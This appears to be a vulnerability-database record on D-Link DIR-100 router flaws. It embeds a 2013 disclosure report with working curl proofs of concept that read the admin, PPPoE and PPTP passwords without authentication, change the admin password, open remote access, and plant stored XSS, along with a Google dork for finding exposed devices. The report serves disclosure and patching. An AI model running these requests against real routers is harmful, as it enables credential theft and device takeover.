            "trust": 1.8,
            "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-13957",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.5,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.8,
            "id": "VHN-66029",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-6027",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-6027",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-13957",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201310-478",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-66029",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Stack-based buffer overflow in the RuntimeDiagnosticPing function in /bin/webs on D-Link DIR-100 routers might allow remote authenticated administrators to execute arbitrary commands via a long set/runtime/diagnostic/pingIp parameter to Tools/tools_misc.xgi. Various D-Link routers allow administrative web actions if the HTTP request contains a specific User-Agent string. This backdoor allows an attacker to bypass password authentication and access the router\u0027s administrative web interface. Planex and Alpha Networks devices may also be affected. The D-Link DIR-100 routers are router devices. Triggers the vulnerability to crash the web interface. Multiple Vendors are prone to a stack-based buffer-overflow vulnerability. \nExploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices. \nThe following are vulnerable:\nD-Link DIR-120\nD-Link DI-624S\nD-Link DI-524UP\nD-Link DI-604S\nD-Link DI-604UP\nD-Link DI-604\nD-Link DIR-100\nD-Link TM-G5240\nPLANEX COMMUNICATIONS BRL-04UR\nPLANEX COMMUNICATIONS BRL-04R\nPLANEX COMMUNICATIONS BRL-04CW. The vulnerability is caused by the script\u0027s lack of sufficient filtering of the parameters submitted by the user",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      },
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "BID",
        "id": "63234"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      }
    ],
    "trust": 3.24
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-66029",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#248083",
        "trust": 3.9
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "63234",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "38810",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "db": "BID",
        "id": "63234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "id": "VAR-201310-0389",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      }
    ],
    "trust": 1.4607143
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:18:43.935000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.dlink.com/"
      },
      {
        "title": "D-Link DIR-100 router \u2018RuntimeDiagnosticPing\u2019 Fixing measures for stack-based buffer error vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=234983"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://www.kb.cert.org/vuls/id/248083"
      },
      {
        "trust": 2.3,
        "url": "http://pastebin.com/raw.php?i=vbig42vd"
      },
      {
        "trust": 0.8,
        "url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
      },
      {
        "trust": 0.8,
        "url": "http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/"
      },
      {
        "trust": 0.8,
        "url": "http://www.dlink.com/uk/en/support/security "
      },
      {
        "trust": 0.8,
        "url": "http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html"
      },
      {
        "trust": 0.8,
        "url": "http://pastebin.com/vbig42vd"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6027"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6027"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "db": "BID",
        "id": "63234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "db": "BID",
        "id": "63234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-10-17T00:00:00",
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "date": "2013-10-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "date": "2013-10-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "date": "2013-10-14T00:00:00",
        "db": "BID",
        "id": "63234"
      },
      {
        "date": "2013-10-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "date": "2013-10-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "date": "2013-10-19T10:36:09.180000",
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-07-29T00:00:00",
        "db": "CERT/CC",
        "id": "VU#248083"
      },
      {
        "date": "2013-10-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-13957"
      },
      {
        "date": "2013-10-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-66029"
      },
      {
        "date": "2013-12-10T00:56:00",
        "db": "BID",
        "id": "63234"
      },
      {
        "date": "2013-10-22T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-004824"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      },
      {
        "date": "2024-11-21T01:58:38.873000",
        "db": "NVD",
        "id": "CVE-2013-6027"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link routers authenticate administrative access using specific User-Agent string",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#248083"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201310-478"
      }
    ],
    "trust": 0.6
  }
}

var-202002-0667
Vulnerability from variot

D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script. D-Link DIR-100 contains a vulnerability related to insufficient protection of credentials. Information may be obtained or tampered with, and a denial of service (DoS) may result. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. When a user logs in to the D-Link DIR-100 Ethernet Broadband Router management interface, access to cliget.cgi is not correctly restricted. A submitted request is checked only for whether the IP addresses are the same, so an attacker who is not authorized can still gain access and, for example, obtain the management password. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability. An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79 Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description of the Vulnerabilities
4. Severity and Remediation
5. Timeline

1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

  • Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
  • Retrieve sensitive configuration parameters like the PPPoE username and password without authentication [CWE-200]
  • Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
  • Send a formatted request to a victim that will then execute arbitrary commands on the device (CSRF) [CWE-352]
  • Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]

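CVE numbers for these vulnerabilities had not yet been assigned when this section was written; the report header lists the identifiers assigned since (CVE-2013-7051 through CVE-2013-7055).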

3 Technical Description of the Vulnerabilities

3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on /cliget.cgi for unauthenticated users and /cli.cgi for authenticated requests.

A list of the features provided by each CGI script can be retrieved with:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

3.1 Authentication Bypass

Description

The administrator password is not protected in any way on the device: it can be retrieved by any attacker with access to the administrator interface, which listens on port 80. The request that retrieves the administrator password does not need to be authenticated.

Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

3.2 Weak Authentication

Description

As soon as a user is logged into the administration interface, the cli CGI is unlocked and can be used without prior authentication, because the CGI script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the IP address is the same.

Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/'

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login

3.3 Retrieve sensitive information

Description

Besides retrieving the administrator password without authentication, it is also possible to retrieve other sensitive configuration from the device, such as the PPTP and PPPoE usernames and passwords, the configured DynDNS username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.

Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

3.4 Cross-Site Request Forgery (CSRF)

Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.

Proof of Concept

Changing the password for administrator can be done when the ip-address is authenticated:

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'

# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

3.5 Cross-Site Scripting (XSS)

Description

It is possible for an authenticated user to store information on the server that is not checked on the server side for special characters, which results in persistent cross-site scripting vulnerabilities. With this vulnerability, the victim (administrator) will run JavaScript code in the context of the D-Link DIR-100.

XSS is possible because input is filtered and validated only on the client side (JavaScript code); data sent directly to the CGI scripts is not subject to these checks.

Proof of Concept

# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'

#  XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='

# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

4 Severity and Remediation

These exploits are considered very critical, especially when the remote administration feature is activated on the system.
Weak authentication, together with cross-site request forgery and authentication bypass can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet-port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100.

5 Timeline

2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0667",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.03b07"
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "dir-100  firmware  4.03b07"
      },
      {
        "model": "dir-100 ethernet broadband router 4.03b07",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b07",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-100 4.03b13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Felix Richter",
    "sources": [
      {
        "db": "BID",
        "id": "65290"
      },
      {
        "db": "PACKETSTORM",
        "id": "125041"
      }
    ],
    "trust": 0.4
  },
  "cve": "CVE-2013-7052",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2013-7052",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2014-01476",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2013-7052",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2013-7052",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2013-7052",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2013-7052",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2014-01476",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202002-037",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2014-01476"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007146"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202002-037"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7052"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. When a user logs in to the D-Link DIR-100 Ethernet Broadband Router management interface, the access to the cliget.cgi is not correctly restricted. The submitted request is only checked whether the IP addresses are the same, and the attacker is not authorized to access. For example, the management password information is obtained. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary  script code in the browser of an unsuspecting user in the context of the  affected device, steal cookie-based authentication credentials,  bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. 
* Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software:    ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n    * Hardware Revision: D1\n    * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n    * CWE-287 Authentication Issues:             CVE-2013-7051\n    * CWE-255 Issues with Credential Management: CVE-2013-7052\n    * CWE-352 Cross-Site Request Forgery:        CVE-2013-7053\n    * CWE-79  Cross-Site Scripting:              CVE-2013-7054\n    * CWE-200 Information Disclosure:            CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n    1. Background\n    2. Technical Description\n    4. Severity and Remediation\n    5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. 
